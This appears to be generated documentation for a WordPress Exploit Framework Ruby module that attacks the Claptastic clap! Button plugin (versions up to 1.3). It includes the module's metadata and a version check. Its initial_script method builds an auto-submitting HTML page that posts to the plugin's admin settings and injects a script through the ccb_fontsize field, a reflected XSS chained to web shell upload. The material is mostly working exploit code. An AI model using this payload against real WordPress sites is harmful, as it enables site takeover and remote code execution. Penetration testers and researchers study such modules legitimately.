class Wpxf::Exploit::ClaptasticClapButtonReflectedXssShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/claptastic_clap_button_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Claptastic clap! Button <= 1.3 Reflected XSS Shell Upload',
    author: [
      'Sachin Wagh', # Disclosure
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8427'],
      ['URL', 'https://packetstormsecurity.com/files/136443/']
    ],
    date: 'Mar 28 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/claptastic_clap_button_reflected_xss_shell_upload.rb, line 23
def check
  check_plugin_version_from_readme('claptastic-clap-button', '1.4')
end
initial_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/claptastic_clap_button_reflected_xss_shell_upload.rb, line 31
def initial_script
  %|<html><head></head><body><script>
    #{js_post}
    post('#{vulnerable_url}?page=claptastic-clap-button.php', {
      ccb_fontsize: '"><script>#{xss_ascii_encoded_include_script}<\\/script>',
      ccb_position: 'bottomright',
      ccb_margin: '',
      ccb_paddingrightleft: '',
      ccb_design: '',
      ccb_onfrontpage: 'no',
      update_ClaptasticClapButtonPluginSettings: 'Update Settings'
    });
  </script></body></html>
  |
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/claptastic_clap_button_reflected_xss_shell_upload.rb, line 27
def vulnerable_url
  normalize_uri(wordpress_url_admin, 'options-general.php')
end